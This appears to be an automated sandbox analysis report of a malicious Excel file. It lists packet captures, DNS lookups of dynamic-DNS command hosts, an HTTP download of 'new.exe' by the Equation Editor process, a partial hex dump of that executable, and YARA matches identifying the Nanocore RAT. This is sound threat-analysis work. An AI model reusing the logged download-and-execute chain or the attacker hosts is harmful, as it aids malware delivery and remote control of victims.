                                                                  Jun 9, 2021 08:04:57.342482090 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342494965 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342504025 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342509985 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342530966 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.344120979 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.478873968 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.478913069 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.478935957 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.478964090 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.478986979 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479012966 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479038000 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479057074 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479062080 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479080915 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479083061 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479088068 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479091883 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479125023 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479127884 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479151964 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479159117 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479176044 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479182959 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479203939 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479227066 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479228973 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479238987 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479252100 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479254961 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479275942 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479288101 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479301929 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479302883 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479329109 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479336023 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479352951 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479363918 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479377985 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479379892 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479404926 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.479413033 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.479429007 CEST8049167198.12.127.155192.168.2.22

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jun 9, 2021 08:05:28.973939896 CEST5219753192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:29.020330906 CEST53521978.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:34.258011103 CEST5309953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:34.302454948 CEST53530998.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:34.302964926 CEST5309953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:34.345746040 CEST53530998.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:39.508816957 CEST5283853192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:39.553456068 CEST53528388.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:39.564157009 CEST5283853192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:39.609002113 CEST53528388.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:44.790477991 CEST6120053192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:44.835094929 CEST53612008.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:44.879162073 CEST4954853192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:05:44.921695948 CEST53495488.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:05:45.024209976 CEST4954853192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:05:45.068455935 CEST53495488.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:05:45.136424065 CEST5562753192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:45.181301117 CEST53556278.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:49.244317055 CEST5600953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:49.287616968 CEST53560098.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:49.288036108 CEST5600953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:49.332956076 CEST53560098.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:49.374538898 CEST6186553192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:05:49.419663906 CEST53618658.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:05:49.429322004 CEST5517153192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:49.472683907 CEST53551718.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:49.473159075 CEST5517153192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:49.518783092 CEST53551718.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:53.554864883 CEST5249653192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:53.599143982 CEST53524968.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:53.629894018 CEST5756453192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:05:53.672451019 CEST53575648.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:05:53.681068897 CEST6300953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:53.725708961 CEST53630098.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:53.726066113 CEST6300953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:53.769005060 CEST53630098.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:05:57.819849968 CEST5931953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:05:57.864238024 CEST53593198.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:03.036978960 CEST5307053192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:03.079896927 CEST53530708.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:08.258384943 CEST5977053192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:08.301292896 CEST53597708.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:13.473875999 CEST6152353192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:13.516377926 CEST53615238.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:13.517004967 CEST6152353192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:13.559509993 CEST53615238.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:13.583936930 CEST6279153192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:06:13.628263950 CEST53627918.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:06:13.628712893 CEST6279153192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:06:13.671596050 CEST53627918.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:06:13.718298912 CEST5066753192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:13.761213064 CEST53506678.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:17.805857897 CEST5412953192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:17.850658894 CEST53541298.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:17.881568909 CEST6532953192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:06:17.925237894 CEST53653298.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:06:17.931976080 CEST6071853192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:17.976290941 CEST53607188.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:17.976998091 CEST6071853192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:18.019859076 CEST53607188.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:22.055557013 CEST4915753192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:22.098540068 CEST53491578.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:22.135066032 CEST5739153192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:06:22.178117037 CEST53573918.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:06:22.270802021 CEST6185853192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:22.313879013 CEST53618588.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:26.361294031 CEST6250053192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:26.405859947 CEST53625008.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:26.406435013 CEST6250053192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:26.453803062 CEST53625008.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:31.619246006 CEST5165253192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:31.662369013 CEST53516528.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:31.662908077 CEST5165253192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:31.705940962 CEST53516528.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:36.878632069 CEST6276253192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:36.923249960 CEST53627628.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:42.094835997 CEST5690553192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:42.137829065 CEST53569058.8.8.8192.168.2.22
                                                                  Jun 9, 2021 08:06:42.142875910 CEST5460953192.168.2.228.8.4.4
                                                                  Jun 9, 2021 08:06:42.190478086 CEST53546098.8.4.4192.168.2.22
                                                                  Jun 9, 2021 08:06:42.193797112 CEST5810153192.168.2.228.8.8.8
                                                                  Jun 9, 2021 08:06:42.237989902 CEST53581018.8.8.8192.168.2.22

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Jun 9, 2021 08:05:28.973939896 CEST192.168.2.228.8.8.80x3a4cStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:34.258011103 CEST192.168.2.228.8.8.80xb4c8Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:34.302964926 CEST192.168.2.228.8.8.80xb4c8Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:39.508816957 CEST192.168.2.228.8.8.80x2426Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:39.564157009 CEST192.168.2.228.8.8.80x2426Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:44.790477991 CEST192.168.2.228.8.8.80x325cStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:44.879162073 CEST192.168.2.228.8.4.40x7905Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:45.024209976 CEST192.168.2.228.8.4.40x7905Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:45.136424065 CEST192.168.2.228.8.8.80xc2b2Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:49.244317055 CEST192.168.2.228.8.8.80xa796Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:49.288036108 CEST192.168.2.228.8.8.80xa796Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:49.374538898 CEST192.168.2.228.8.4.40x7d97Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:49.429322004 CEST192.168.2.228.8.8.80xd791Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:49.473159075 CEST192.168.2.228.8.8.80xd791Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:53.554864883 CEST192.168.2.228.8.8.80x9ffaStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:53.629894018 CEST192.168.2.228.8.4.40xc765Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:53.681068897 CEST192.168.2.228.8.8.80x4f70Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:53.726066113 CEST192.168.2.228.8.8.80x4f70Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:57.819849968 CEST192.168.2.228.8.8.80x27afStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:03.036978960 CEST192.168.2.228.8.8.80x1e37Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:08.258384943 CEST192.168.2.228.8.8.80x2457Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:13.473875999 CEST192.168.2.228.8.8.80x876dStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:13.517004967 CEST192.168.2.228.8.8.80x876dStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:13.583936930 CEST192.168.2.228.8.4.40x9519Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:13.628712893 CEST192.168.2.228.8.4.40x9519Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:13.718298912 CEST192.168.2.228.8.8.80xd1b4Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:17.805857897 CEST192.168.2.228.8.8.80x1ce0Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:17.881568909 CEST192.168.2.228.8.4.40x5286Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:17.931976080 CEST192.168.2.228.8.8.80x5ed5Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:17.976998091 CEST192.168.2.228.8.8.80x5ed5Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:22.055557013 CEST192.168.2.228.8.8.80x352fStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:22.135066032 CEST192.168.2.228.8.4.40x8423Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:22.270802021 CEST192.168.2.228.8.8.80x64dStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:26.361294031 CEST192.168.2.228.8.8.80xe85aStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:26.406435013 CEST192.168.2.228.8.8.80xe85aStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:31.619246006 CEST192.168.2.228.8.8.80xfcdfStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:31.662908077 CEST192.168.2.228.8.8.80xfcdfStandard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:36.878632069 CEST192.168.2.228.8.8.80xbf52Standard query (0)wekeepworking.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:42.094835997 CEST192.168.2.228.8.8.80xbf28Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:42.142875910 CEST192.168.2.228.8.4.40x3a49Standard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:42.193797112 CEST192.168.2.228.8.8.80x474aStandard query (0)wekeepworking12.sytes.netA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Jun 9, 2021 08:05:29.020330906 CEST8.8.8.8192.168.2.220x3a4cNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:34.302454948 CEST8.8.8.8192.168.2.220xb4c8No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:34.345746040 CEST8.8.8.8192.168.2.220xb4c8No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:39.553456068 CEST8.8.8.8192.168.2.220x2426No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:39.609002113 CEST8.8.8.8192.168.2.220x2426No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:05:57.864238024 CEST8.8.8.8192.168.2.220x27afNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:03.079896927 CEST8.8.8.8192.168.2.220x1e37No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:08.301292896 CEST8.8.8.8192.168.2.220x2457No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:26.405859947 CEST8.8.8.8192.168.2.220xe85aNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:26.453803062 CEST8.8.8.8192.168.2.220xe85aNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:31.662369013 CEST8.8.8.8192.168.2.220xfcdfNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:31.705940962 CEST8.8.8.8192.168.2.220xfcdfNo error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)
                                                                  Jun 9, 2021 08:06:36.923249960 CEST8.8.8.8192.168.2.220xbf52No error (0)wekeepworking.sytes.net79.134.225.90A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • 198.12.127.155

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.2249167198.12.127.15580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jun 9, 2021 08:04:57.065510035 CEST0OUTGET /new.exe HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                  Host: 198.12.127.155
                                                                  Connection: Keep-Alive
                                                                  Jun 9, 2021 08:04:57.205565929 CEST1INHTTP/1.1 200 OK
                                                                  Date: Wed, 09 Jun 2021 06:04:57 GMT
                                                                  Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                  Last-Modified: Tue, 08 Jun 2021 22:22:11 GMT
                                                                  ETag: "b3400-5c44896d8ef42"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 734208
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-msdownload
                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7f ed bf 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 28 0a 00 00 0a 01 00 00 00 00 00 9e 47 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 47 0a 00 4b 00 00 00 00 60 0a 00 60 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 27 0a 00 00 20 00 00 00 28 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 07 01 00 00 60 0a 00 00 08 01 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 32 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 47 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 53 00 00 20 3b 00 00 03 00 00 00 0d 00 00 06 10 8f 00 00 32 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 be 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 7d 00 00 00 29 00 00 00 05 00 00 00 49 00 00 00 88 00 00 00 38 78 00 00 00 28 04 00 00 06 38 00 00 00 00 38 74 00 00 00 20 04 00 00 00 7e 87 00 00 04 39 c4 ff ff ff 26 38 ba ff ff ff 18 3a 34 00 00 00 20 00 00 00 00 7e 61 00 00 04 3a a9 ff ff ff 26 20 00 00 00 00 38 9e ff ff ff 38 2f 00 00 00 20 02 00 00 00 7e 7b 00 00 04 3a 8a ff ff ff 26 38 80 ff ff ff 28 03 00 00 06 20 03 00 00 00 7e 2a 00 00 04 39 70 ff ff ff 26 38 66 ff ff ff 1d 3a 82 ff ff ff 38 01 00 00 00 2a 38 fa ff ff ff 38 d0 ff ff ff 00 00 06 2a 00 00 1e 00 28 02 00 00 06 2a 1e 00 28 30 00 00 06 2a 26 7e 01 00 00 04 14 fe 01 2a 00 00 1a 7e 01 00 00 04 2a 00 13 30 04 00 74 00 00 00 01 00 00 11 02 28 01 00 00 0a 20 00 00 00 00 7e 21 00 00 04 3a 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 db ff ff ff fe 0c 00 00 45 02 00 00 00 20 00 00 00 05 00 00 00 38 1b 00 00 00 2a 38 fa ff ff ff 20 01 00 00 00 7e 71 00 00 04 3a d9 ff ff ff 26 38 cf ff ff ff 02 03 16 39 0c 00 00 00 26 26 38 00 00 00 00 38 d1 ff ff ff 7d 03 00 00 04 38 c8 ff ff ff 7e 02 16 1d 39 05 00 00 00 38 0b 00 00 00 26 7b 03 00 00 04 38 06 00 00 00 26 38 f0 ff ff ff 2a 7e 02 1b 1a 39 05 00 00 00 38 0b 00
                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`(G `@ @PGK`` H.text' ( `.rsrc``*@@.reloc2@BGHS ;20 8E})I8x(88t ~9&8:4 ~a:& 88/ ~{:&8( ~*9p&8f:8*88*(*(0*&~*~*0t( ~!:& 88E 8*8 ~q:&89&&88}8~98&{8&8*~98


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:08:04:44
                                                                  Start date:09/06/2021
                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                  Imagebase:0x13f3b0000
                                                                  File size:27641504 bytes
                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:08:05:07
                                                                  Start date:09/06/2021
                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                  Imagebase:0x400000
                                                                  File size:543304 bytes
                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:08:05:09
                                                                  Start date:09/06/2021
                                                                  Path:C:\Users\Public\vbc.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                                  Imagebase:0xdf0000
                                                                  File size:734208 bytes
                                                                  MD5 hash:EB43B3C033BD76B51B90A51A6726A81C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2207997590.0000000000DF2000.00000020.00020000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000000.2148408702.0000000000DF2000.00000020.00020000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2208071587.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, Author: Florian Roth
